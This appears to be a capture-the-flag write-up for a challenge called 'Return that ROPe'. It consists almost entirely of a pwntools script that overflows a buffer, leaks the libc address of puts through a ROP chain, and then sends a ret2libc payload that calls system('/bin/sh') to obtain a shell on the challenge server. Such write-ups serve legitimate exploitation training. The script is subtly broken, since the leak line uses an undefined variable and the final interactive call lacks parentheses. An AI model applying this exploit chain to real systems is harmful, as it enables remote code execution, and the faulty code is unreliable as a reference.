# Return that ROPe

![Binary checksec](https://1833529925-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FinQyBSsBMfzzjTjEh3xk%2Fuploads%2FJN6WTcBctTsT71BlCNID%2Fimage.png?alt=media\&token=57456093-54d9-478e-accc-c3c596f3317a)

![Libc found after leak of address](https://1833529925-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FinQyBSsBMfzzjTjEh3xk%2Fuploads%2F5AIMYQisiXE2MYY7YwqI%2Fimage.png?alt=media\&token=94c16c4c-7c56-4308-abb2-8b924615acb2)

```python
from pwn import *

LOCAL = False
REMOTETTCP = True
host= 'challenges.ctf.cert.rcts.pt'
port=41135
LOCAL_BIN = "./rop_patched"
context.clear(arch='amd64')
LIBC = ELF("libc6_2.27-3ubuntu1.4_amd64.so")


if LOCAL:
    P = process(LOCAL_BIN)
    ELF_LOADED = ELF(LOCAL_BIN)
    ROP_LOADED = ROP(ELF_LOADED)

elif REMOTETTCP:
    P = remote(host,port)
    ELF_LOADED = ELF(LOCAL_BIN)
    ROP_LOADED = ROP(ELF_LOADED)


OFFSET = b'A'*40

PUTSGOT = ELF_LOADED.got['puts']
MAIN = ELF_LOADED.symbols['main']
PUTSPLT = ELF_LOADED.plt['puts']
POP_RDI = (ROP_LOADED.find_gadget(['pop rdi', 'ret']))[0]
RET = (ROP_LOADED.find_gadget(['ret']))[0]

log.info("puts@plt: " + hex(PUTSPLT) )
log.info("puts@got: " + hex(PUTSGOT))
log.info("pop rdi gadget: " + hex(POP_RDI))

#For leak Puts@got Address
payload = OFFSET
payload += p64(POP_RDI)
payload += p64(PUTSGOT)
payload += p64(PUTSPLT)
payload += p64(MAIN)

P.sendline(payload)

leakedlib=P.recvlines(4)[2]
leak = u64(a.strip().ljust(8, b'\x00'))

log.info("Leaked puts@got: %s" % hex(leak)) #With this search libc

LIBC.address = leak - LIBC.sym["puts"]
log.info("Address of libc %s " % hex(LIBC.address))

#Shell Exploit
BINSH = next(LIBC.search(b"/bin/sh")) 
SYSTEM = LIBC.sym["system"]
RET = 0x0000000000401016 # RET for stack alignment.

payload = OFFSET + p64(POP_RDI) + p64(BINSH) +p64(RET)+ p64(SYSTEM)

P.sendlineafter(b'Can you ROP it?',payload)

P.interactive
```